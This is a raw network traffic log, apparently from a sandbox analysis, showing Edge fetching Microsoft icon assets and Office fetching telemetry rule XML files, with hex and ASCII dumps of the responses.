2024-11-23 06:09:46 UTC	1427	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.6	49891	13.107.246.40	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:45 UTC	430	OUT	GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:46 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:46 GMT Content-Type: image/png Content-Length: 2008 Connection: close Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT ETag: 0x8DBC9B5C0C17219 x-ms-request-id: 262987a9-101e-003c-042a-3ddcdc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060946Z-178bfbc474brk967hC1NYCfu6000000003u000000000ckms Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:46 UTC	2008	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*\|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.6	49892	13.107.246.40	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:46 UTC	422	OUT	GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:46 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:46 GMT Content-Type: image/png Content-Length: 2229 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT ETag: 0x8DBD59359A9E77B x-ms-request-id: b89fa148-901e-002d-4fd8-3cebc7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060946Z-174c587ffdf89smkhC1TEB697s00000002h000000000kae2 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:46 UTC	2229	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.6	49899	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:47 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:48 UTC	471	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:47 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: 6acb8fba-801e-0015-526e-3df97f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060947Z-15b8b599d886w4hzhC1TEBb4ug00000002g000000000g03b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-23 06:09:48 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.6	49877	23.209.72.40	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:47 UTC	751	OUT	GET /statics/icons/favicon_newtabpage.png HTTP/1.1 Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: _C_ETH=1; USRLOC=; MUID=076D87ACE96D60880BB292ECE84461D8; _EDGE_S=F=1&SID=362A82EB85AA6E9C174A97AB845F6F4F; _EDGE_V=1
2024-11-23 06:09:47 UTC	1002	IN	HTTP/1.1 200 OK Content-Type: image/png ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117" Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT Server: AkamaiNetStorage Date: Sat, 23 Nov 2024 06:09:47 GMT Content-Length: 354 Connection: close Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.210.4.148,b=767666903,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.210.4.148 Akamai-Request-ID: 2dc1aad7 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Cache-Control: public, max-age=31536000 report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Timing-Allow-Origin: * Akamai-GRN: 0.9404d217.1732342187.2dc1aad7 Vary: Origin
2024-11-23 06:09:47 UTC	354	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 f7 49 44 41 54 78 01 ed 57 d1 0d 83 20 10 7d e9 04 8c d0 51 d8 a4 8e e0 06 32 42 37 b2 23 74 03 47 a0 1b b4 10 21 62 cb 79 ca d1 f8 c3 4b 5e 34 70 be 7b 22 07 08 34 fc 42 3b 8e 8e d6 f1 5d 91 5e f3 c6 25 1f 2a 27 cd 71 a0 92 77 49 90 71 54 44 5c 8c 39 02 af d5 27 cf ea 5c d0 18 3a 7b 46 ac c4 40 84 c1 f2 39 48 61 85 ff 19 50 e1 59 2b 11 8e 93 f3 8a 32 90 79 f6 1a 30 a8 33 19 8b 0d 78 dc 21 2f 53 91 01 09 56 79 2e 38 19 cd 40 33 b0 c7 c0 0d 73 c9 4d 58 ef 66 47 db 59 50 65 38 25 7d 56 d0 9e cd b3 67 04 Data Ascii: PNGIHDR szzpHYs%%IR$sRGBgAMAaIDATxW }Q2B7#tG!byK^4p{"4B;]^%*'qwIqTD\9'\:{F@9HaPY+2y03x!/SVy.8@3sMXfGYPe8%}Vg

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.6	49896	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:47 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:47 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 9a1c1dfd-501e-000a-5c30-3c0180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060947Z-178bfbc474bmqmgjhC1NYCy16c000000046g000000003u2z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:48 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.6	49897	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:47 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:48 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060948Z-178bfbc474bpnd5vhC1NYC4vr4000000043g000000005e63 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:48 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.6	49898	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:47 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:48 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: 137cb315-101e-0017-3264-3b47c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060948Z-178bfbc474bmqmgjhC1NYCy16c000000045g000000005sm0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:48 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.6	49900	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:48 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:48 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:48 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: c229ce53-501e-008f-23c3-3b9054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060948Z-15b8b599d882hxlwhC1TEBfa5w00000002dg000000009m95 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:48 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.6	49902	13.107.246.40	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:48 UTC	425	OUT	GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:48 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:48 GMT Content-Type: image/png Content-Length: 1154 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT ETag: 0x8DBD5935D5B3965 x-ms-request-id: b5bd8ae7-b01e-0031-7959-3c33d0000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060948Z-174c587ffdfgcs66hC1TEB69cs00000002bg00000000decy Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:48 UTC	1154	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.6	49903	13.107.246.40	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:48 UTC	431	OUT	GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:48 UTC	536	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:48 GMT Content-Type: image/png Content-Length: 1468 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT ETag: 0x8DBDCB5E23DFC43 x-ms-request-id: 31693453-e01e-0066-045c-3dda5d000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060948Z-15b8b599d88l2dpthC1TEBmzr000000002g0000000008p5e Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:48 UTC	1468	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q\|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.6	49880	18.238.49.124	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
